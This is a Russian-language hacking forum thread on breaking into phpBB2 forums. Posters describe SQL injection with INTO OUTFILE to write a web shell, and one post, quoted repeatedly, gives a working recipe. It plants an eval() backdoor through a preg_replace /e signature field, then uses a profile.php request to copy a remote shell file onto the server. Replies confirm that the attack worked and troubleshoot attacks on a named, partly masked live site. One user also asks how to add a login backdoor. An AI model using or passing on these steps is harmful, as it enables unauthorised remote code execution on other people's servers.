 |
|
17.04.2008, 21:25
|
|
Познающий
Регистрация: 01.03.2008
Сообщений: 39
С нами:
9576326
Репутация:
24
|
|
Посмотрел логи апача... логи молчат. никаких соденений не устанавливалось на отдачу файлика db.txt
|
|
|
27.04.2008, 00:26
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами:
9567396
Репутация:
23
|
|
А что делать если profile.php просто нету?
Not Found
The requested URL /phpBB2/profile.php was not found on this server.
|
|
|
|
19.05.2008, 12:26
|
|
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
С нами:
11141693
Репутация:
56
|
|
Схожая проблема, только чуть сложнее
2.0.21 чистый (без модов).
Админка есть
нулевой байт экранируется
мускуль-иньекция в скрипте ЦМС (не пхпбб)
чкрез восстановление БД - то же не получится, форум криво настроен, что нельзя сделать декап БД  (оказалось что иногда криворукость помогает))))
Не пойму другого:
стараюсь делать через иньекцию INTO OUTFILE в */avatars/shel.php через CHAR или через 0x
Сервер мне только выдает строку в странице ту что после select но в файл не выводит
LOAD_FILE - вообще ни чего не выводит, но это я понял на всех хостингах, на моем тоже не выводит при чистом запросе из мускуль клиента.
Можно что то еще сделать по этим признакам?
спасибо
ЗЫ
Все работает!! Это я про експлоит Шанкара, рано разочаровался, то экранировало нул. байт в запросе SQL а через эксплойт все прошло! Вери гуд! 
Последний раз редактировалось tmp; 22.05.2008 в 03:53..
|
|
|
|
01.06.2008, 13:32
|
|
Новичок
Регистрация: 06.12.2007
Сообщений: 1
С нами:
9699617
Репутация:
0
|
|
Не могу найти тему. Если кто помнит подскажите. Как сохранить возможность в phpbb заходить под любым логином. Там надо было добавить код при авторизации (был нужен доступ по ftp)
|
|
|
|
11.04.2010, 18:06
|
|
Новичок
Регистрация: 25.02.2010
Сообщений: 15
С нами:
8531143
Репутация:
2
|
|
проще всего залить шелл:
создаем 1.sql cо следующим содержанием:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;
далее:
profile.php?mode=editprofile&c=copy('http://127.0.0.1/shell.txt','/home/home/public_html/forum/shell.php');
Всё готово 
Последний раз редактировалось $cr1pt; 11.04.2010 в 18:09..
|
|
|
|
22.03.2012, 18:19
|
|
Познающий
Регистрация: 16.01.2012
Сообщений: 40
С нами:
7538006
Репутация:
0
|
|
Сообщение от $cr1pt
проще всего залить шелл:
создаем 1.sql cо следующим содержанием:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;
далее:
profile.php?mode=editprofile&c=copy('http://127.0.0.1/shell.txt','/home/home/public_html/forum/shell.php');
Всё готово
Спасибо, залился.
Всё перепробовал что только можно, а сделал как тут указано и всё ок.
П.С поэтому апнул тему...
|
|
|
|
03.05.2012, 22:54
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Добавляю сигнатуру, захожу в профиль и вижу
Сообщение от None
Warning: preg_replace() [function.preg-replace]: No ending delimiter '#' found in [path]/admin/admin_users.php on line 843
код, есесно, не выполняется.
посмотрел соурсы движка
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$signature[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$this_userdata[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_sig_bbcode_uid'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) ?[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'#:'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this_userdata[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_sig_bbcode_uid'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'#si'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this_userdata[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_sig'[/COLOR][COLOR="#007700"]]) :[/COLOR][COLOR="#0000BB"]$this_userdata[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_sig'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$signature[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$html_entities_match[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$html_entities_replace[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$signature[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Видно, что регулярка идет не через "/", а через "#"
заменил (.+)/e на (.+)#e - ошибка исчезла, но код не выполняется. |
|
|
|
04.05.2012, 12:58
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Сообщение от $cr1pt
проще всего залить шелл:
создаем 1.sql cо следующим содержанием:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;
далее:
profile.php?mode=editprofile&c=copy('http://127.0.0.1/shell.txt','/home/home/public_html/forum/shell.php');
Всё готово
Обычно это прокатывало, на встретил форум, когда при заходе в профиль висит надпись,
Сообщение от None
запрещено редактировать чужой профиль
код не выполняется ((
Случ, не знаете другой способ? (file_priv N, аву не заинклудить нету прав на заливку файлов и аватаров)
|
|
|
|
04.05.2012, 13:17
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от OxoTnik
Обычно это прокатывало, на встретил форум, когда при заходе в профиль висит надпись,
код не выполняется ((
Случ, не знаете другой способ? (file_priv N, аву не заинклудить нету прав на заливку файлов и аватаров)
сессию в гете нужно держать. Сайт случаем, не http://b******oi.ru?
|
|
|
|
04.05.2012, 13:22
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Сообщение от попугай
сессию в гете нужно держать. Сайт случаем, не http://b******oi.ru?
да)
ну тогда спортивный вопрос, как сессию держать в гете?
не хочешь не надо) но я его всё равно добью.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
